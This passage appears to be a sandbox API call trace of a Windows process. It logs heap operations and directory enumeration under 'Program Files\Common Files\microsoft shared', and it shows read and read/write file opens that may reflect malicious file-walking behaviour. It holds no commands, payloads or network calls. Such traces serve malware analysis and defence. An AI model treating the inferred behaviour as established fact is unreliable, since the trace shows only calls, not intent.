lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.571] GetLastError () returned 0x5 [0102.571] GetLastError () returned 0x5 [0102.571] SetLastError (dwErrCode=0x5) [0102.571] GetLastError () returned 0x5 [0102.571] SetLastError (dwErrCode=0x5) [0102.572] GetLastError () returned 0x5 [0102.572] SetLastError (dwErrCode=0x5) [0102.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0102.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0102.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.572] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.572] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0102.572] FindNextFileW (in: hFindFile=0x784d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x78, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x828d0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x78, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="")) returned 0 [0102.572] FindClose (in: hFindFile=0x784d0 | out: hFindFile=0x784d0) returned 1 [0102.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0102.572] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0102.572] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Triedit\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78550 [0102.573] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.573] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b209410, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xa0b58502, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b209410, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0102.573] FindClose (in: hFindFile=0x78550 | out: hFindFile=0x78550) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x467b8 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.574] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0102.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8b110 [0102.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0102.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.575] AreFileApisANSI () returned 1 [0102.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VC", lpUsedDefaultChar=0x0) returned 50 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0102.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.575] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.575] AreFileApisANSI () returned 1 [0102.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0102.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46898 [0102.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46898, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC") returned 50 [0102.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC" (normalized: "c:\\program files\\common files\\microsoft shared\\vc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.576] GetLastError () returned 0x5 [0102.576] GetLastError () returned 0x5 [0102.576] SetLastError (dwErrCode=0x5) [0102.576] GetLastError () returned 0x5 [0102.576] SetLastError (dwErrCode=0x5) [0102.576] GetLastError () returned 0x5 [0102.576] SetLastError (dwErrCode=0x5) [0102.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0102.576] AreFileApisANSI () returned 1 [0102.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0102.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46438 [0102.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46438, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC") returned 50 [0102.576] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC" (normalized: "c:\\program files\\common files\\microsoft shared\\vc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.577] GetLastError () returned 0x5 [0102.577] GetLastError () returned 0x5 [0102.577] SetLastError (dwErrCode=0x5) [0102.577] GetLastError () returned 0x5 [0102.577] SetLastError (dwErrCode=0x5) [0102.577] GetLastError () returned 0x5 [0102.577] SetLastError (dwErrCode=0x5) [0102.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0102.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0102.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0102.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0102.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.577] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0b59a78, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="VGX", cAlternateFileName="")) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0102.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0102.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.577] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78490 [0102.578] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xbcd0fab8, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xa0b594b8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x2ce22546, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0102.578] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8127e00, ftCreationTime.dwHighDateTime=0x1cbd076, ftLastAccessTime.dwLowDateTime=0xcd0a4098, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xd8127e00, ftLastWriteTime.dwHighDateTime=0x1cbd076, nFileSizeHigh=0x0, nFileSizeLow=0xf1b50, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdia100.dll", cAlternateFileName="")) returned 1 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0102.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.578] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0102.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.579] AreFileApisANSI () returned 1 [0102.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll", lpUsedDefaultChar=0x0) returned 63 [0102.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0102.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.579] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0102.579] AreFileApisANSI () returned 1 [0102.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0102.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e3e8 [0102.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e3e8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0102.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.579] GetFileType (hFile=0x27c) returned 0x1 [0102.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0102.579] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.580] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.580] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.580] CloseHandle (hObject=0x27c) returned 1 [0102.580] AreFileApisANSI () returned 1 [0102.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0102.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e4f8 [0102.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll") returned 63 [0102.580] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.580] GetFileType (hFile=0x27c) returned 0x1 [0102.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0102.581] CloseHandle (hObject=0x27c) returned 1 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0102.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 